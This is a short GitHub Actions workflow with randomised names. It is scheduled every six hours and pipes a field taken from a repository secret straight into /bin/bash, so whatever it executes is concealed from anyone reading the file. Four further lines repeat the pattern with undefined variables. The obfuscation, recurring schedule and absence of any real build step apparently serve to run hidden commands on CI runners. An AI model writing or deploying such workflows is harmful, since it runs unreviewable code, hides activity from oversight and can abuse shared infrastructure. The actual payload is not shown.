name: yuelinger5678
on:
  workflow_dispatch:
  schedule:
    - cron: '3 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yuelinger5678
        env:
          qjk2004: ${{ secrets.qjk2004 }}
        run: |
          echo $qjk2004 | jq -r .is6533 | /bin/bash
          echo $tfk13080 | jq -r .adu55 | /bin/bash
          echo $xxy61 | jq -r .zdwu34028 | /bin/bash
          echo $mlhdt73695 | jq -r .g0 | /bin/bash
          echo $hlm473 | jq -r .dh7 | /bin/bash

